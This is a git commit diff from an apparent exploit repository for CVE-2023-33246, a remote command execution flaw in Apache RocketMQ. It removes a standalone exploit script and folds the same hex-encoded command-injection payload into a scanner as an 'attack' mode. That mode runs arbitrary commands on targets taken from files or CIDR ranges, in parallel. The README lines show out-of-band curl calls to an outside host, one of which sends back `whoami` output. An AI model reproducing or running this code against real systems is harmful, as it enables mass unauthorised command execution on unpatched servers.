optimize rocketMQ RCE CVE-2023-33246

2023-07-19 11:47:50 +08:00 · 2023-07-19 11:47:50 +08:00 · 95d4f6d0a3
commit 95d4f6d0a3
parent ba539cd6ab
3 changed files with 36 additions and 41 deletions
--- a/MQ-RCE/CVE-2023-33246_exp.py
+++ b/MQ-RCE/CVE-2023-33246_exp.py
@ -1,30 +0,0 @@
-# CVE-2023-33246
-
-import socket
-import sys
-
-if len(sys.argv) < 4:
-    print('Usage: python3 poc.py <ip> <port> <command>')
-    sys.exit(1)
-
-
-def send_data(ip, port, payload):
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-
-    s.connect((ip, port))
-    s.sendall(payload)
-    s.close()
-
-
-if '__main__' == __name__:
-    ip = sys.argv[1]
-    port = int(sys.argv[2])
-    command = ' '.join(sys.argv[3:]).strip()
-    hex_payload_prefix = '000000cd000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f20'
-    hex_payload_suffix = '3b0a'
-    payload = bytes.fromhex(hex_payload_prefix) + command.encode() + bytes.fromhex(hex_payload_suffix)
-    hex_payload_length = hex(len(payload) - 4)[2:]
-    payload = payload.hex().replace('000000cd000000', '000000' + hex_payload_length + '000000')
-    payload = bytes.fromhex(payload)
-
-    send_data(ip, port, payload)
--- a/Tomcat/Apache/CVE-2023-33246
+++ b/Tomcat/Apache/CVE-2023-33246
@ -1,4 +1,6 @@

+# CVE-2023-33246
+
 ## 影响版本
 Apache RocketMQ through 5.1.0

@ -13,7 +15,8 @@ python check.py --ip 127.0.0.1

 ## exp
 ```python
-python CVE-2023-33246_exp.py 127.0.0.1 9876 curl 1.1.1.1:80/`whoami`
+python check.py --file test.txt --attack --command "curl x.x.x.x"
 ```
+利用带外显示结果

-利用带外显示结果
+重新优化check 和exp 脚本，合并功能
--- a/Tomcat/Apache/CVE-2023-33246
+++ b/Tomcat/Apache/CVE-2023-33246
@ -72,23 +72,38 @@ def send_data_to_broker(ip, port):
    resp = None
    data1 = '000000c7000000c37b22636f6465223a3130352c226578744669656c6473223a7b225369676e6174757265223a222f7535502f775a5562686a616e75344c4d2f557a45646f327532493d222c22746f706963223a22544257313032222c224163636573734b6579223a22726f636b65746d7132227d2c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a312c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3430317d'
    try:
-        # Create a socket object
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(3)
-        # Connect to the server at the specified IP and port
        s.connect((ip, port))

-        # Send the payload
        s.sendall(bytes.fromhex(data1))
        resp = s.recv(1024)
        if not resp:
            print("{ip} is not reachable, receive nothing from {port}.".format(ip=ip, port=port))
-        # Close the socket
        s.close()
    except Exception as e:
        sys.stderr.write("{ip}:{port} is not reachable: {e}\n".format(ip=ip, port=port, e=e))
    return resp

+def attack(target,command):
+    """Attack the target"""
+    ip,port=target.get('ip'),int(target.get('port'))
+    print(f'Attacking {ip}:{port}  execute {command}')
+
+    hex_payload_prefix = '000000cd000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f20'
+    hex_payload_suffix = '3b0a'
+    payload = bytes.fromhex(hex_payload_prefix) + command.encode() + bytes.fromhex(hex_payload_suffix)
+    hex_payload_length = hex(len(payload) - 4)[2:]
+    payload = payload.hex().replace('000000cd000000', '000000' + hex_payload_length + '000000')
+    payload = bytes.fromhex(payload)
+
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((ip, port))
+    s.sendall(payload)
+    # resp = s.recv(1024)
+    # print(resp)
+    s.close()
+

 def check_vulnerability(target):
    """Check if the target is vulnerable"""
@ -118,7 +133,6 @@ def check_vulnerability(target):
            if target_version.startswith('V4.9.'):
                minor_version = int(target_version.split('.')[2])
                if minor_version < 6:
-                    print(f'port--- > {port}')
                    print(
                        "{ip}:{port} Vulnerable to CVE-2023-33246 RocketMQ RCE, version: {version}, brokers: {broker_addr}".format(
                            ip=ip, port=port, version=target_version, broker_addr=', '.join(broker_addr)))
@ -145,10 +159,11 @@ def check_vulnerability(target):


 def main():
-    """Main function"""
    parser = argparse.ArgumentParser(description="Check CVE-2023-33246 RocketMQ RCE vulnerability")
    parser.add_argument("--ip", help="A single IP address to check")
    parser.add_argument("--bip", help="A broker IP address to check")
+    parser.add_argument("--attack",action='store_true', help="Change to attack mode without check")
+    parser.add_argument("--command", help="Command to execute, only used in attack mode")
    parser.add_argument("--file", help="A file containing a list of IP addresses, one per line")
    parser.add_argument("--port", type=int, default=9876,
                        help="The port number to use when connecting to the server (default is 9876)")
@ -156,6 +171,11 @@ def main():
    args = parser.parse_args()
    target_list = []

+    command=''
+
+    if args.attack:
+        command=str(args.command).strip()
+
    if args.cidr:
        for ip in ipaddress.ip_network(args.cidr):
            target_list.append({'ip': str(ip), 'port': args.port})
@ -184,14 +204,16 @@ def main():
                    target_list.append({'ip': line, 'port': args.port})

    if not target_list:
-        print("\nPlease provide at least one IP address using --ip or --file")
+        print("\nPlease provide at least one IP address using --ip or --file \n")
        parser.print_help()
-
        return

    with ThreadPoolExecutor() as executor:
        for target in target_list:
-            executor.submit(check_vulnerability, target)
+            if not args.attack:
+                executor.submit(check_vulnerability, target)
+            else:
+                executor.submit(attack,target,command)


 if __name__ == "__main__":